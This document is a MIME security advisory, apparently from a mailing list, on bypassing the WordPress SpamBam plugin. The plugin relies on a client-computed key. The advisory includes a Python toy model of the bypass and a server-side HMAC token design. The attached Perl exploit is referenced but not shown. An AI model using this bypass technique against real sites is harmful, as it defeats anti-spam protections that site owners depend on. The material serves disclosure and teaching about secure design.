This is a multi-part message in MIME format.
--------------020903050506090400050704
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit
The attached exploit demonstrates that the WordPress SpamBam plugin can
be bypassed because it relies on the client for security.
Vulnerable software:
SpamBam (http://wordpress.org/extend/plugins/spambam/) by Gareth Heyes
Vulnerability:
No matter how hard you obfuscate or encrypt your code, never, under any
circumstances, place any security decision in the client. Never!
How the plugin works:
It generates the same pseudo-random code on both the client and the
server and uses it to derive a key.
On form submit, both key values are compared and must match for the
comment to be inserted.
How the exploit works:
It does nothing more than act as a client: it parses the HTML, extracts
the JavaScript, processes it to compute the key, and fills the hidden
field with the result.
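To make the design flaw concrete, here is an added Python model of the scheme described above. It is not the attached spambam.pl and not SpamBam's own code: the derive_key routine, the form markup, the session ids and the token format are all made up for illustration. The first half shows that a verification built on "did the client compute what our JavaScript computes?" is satisfied by any HTTP client that can read the page, so it cannot tell a browser from a script. The second half shows what a server-held secret actually buys (the client cannot forge a token for another session, and each token is accepted once) and, just as importantly, that it still proves nothing about who or what submitted the form. The decision has to stay on the server.

```python
"""Toy model of a client-side anti-spam key check (constructed example).

Mirrors the design in the advisory: the server embeds a random seed and a
key-derivation routine in the page, the client runs the routine and submits
the result in a hidden field, and the server recomputes the same value and
compares. Nothing here is SpamBam's real algorithm.
"""
import hashlib
import hmac
import re
import secrets

# --- Vulnerable design: the key depends only on data the client is given ---

def derive_key(seed: str) -> str:
    """Stand-in for the plugin's JavaScript key routine (assumed, not real).
    Whatever the real routine is, it runs on the client, so the client has it."""
    return hashlib.sha1(seed.encode()).hexdigest()[:8]

def render_comment_form(seed: str) -> str:
    """Server side: the page ships the seed and the derivation logic to the client."""
    return (
        f'<input type="hidden" name="seed" value="{seed}">\n'
        f'<input type="hidden" name="key" value="">\n'
        f'<script>/* browser computes derive_key(seed) and fills #key */</script>'
    )

def server_verify(seed: str, submitted_key: str) -> bool:
    """Server side: accept the comment if the submitted key matches our own
    recomputation. Note that both inputs to this decision came from the client."""
    return hmac.compare_digest(derive_key(seed), submitted_key)

def any_client(html: str) -> dict:
    """Any HTTP client, browser or not, holds everything needed to pass the
    check: the seed is in the page and the routine is public."""
    seed = re.search(r'name="seed" value="([^"]+)"', html).group(1)
    return {"seed": seed, "key": derive_key(seed)}

# --- What a server-held secret changes, and what it does not -------------

SERVER_SECRET = secrets.token_bytes(32)   # never leaves the server
_issued: set[str] = set()                  # single-use token store

def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}:{nonce}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def issue_token(session_id: str) -> str:
    """Server side: bind a fresh nonce to the session with an HMAC the client
    cannot compute, and remember it so it can be accepted exactly once."""
    nonce = secrets.token_hex(8)
    token = f"{nonce}.{_mac(session_id, nonce)}"
    _issued.add(token)
    return token

def verify_token(session_id: str, token: str) -> bool:
    """Server side: reject forged, cross-session and replayed tokens.
    This still says nothing about whether a human filled in the form; it only
    guarantees the token is one we issued for this session and not yet spent."""
    try:
        nonce, mac = token.split(".", 1)
    except ValueError:
        return False
    if token not in _issued or not hmac.compare_digest(_mac(session_id, nonce), mac):
        return False
    _issued.discard(token)   # single use: a replay of the same token fails
    return True

if __name__ == "__main__":
    page = render_comment_form(secrets.token_hex(4))
    sub = any_client(page)
    print("client-derived key accepted by server:", server_verify(sub["seed"], sub["key"]))
    tok = issue_token("session-A")
    print("fresh server token accepted:", verify_token("session-A", tok))
    print("same token replayed:", verify_token("session-A", tok))
```

Run it as a script to see the two halves side by side. The first print is always True regardless of what produced the request, which is the whole point of the advisory; the server-side token section is there to show that even a properly keyed, single-use token only moves the trust boundary onto the server, it does not turn a client-side check into a bot filter.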
Solution:
There's no fix for this. It's a design flaw.
--------------020903050506090400050704
Content-Type: text/plain; x-mac-type="0"; x-mac-creator="0";
name="spambam.pl"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="spambam.pl"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--------------020903050506090400050704--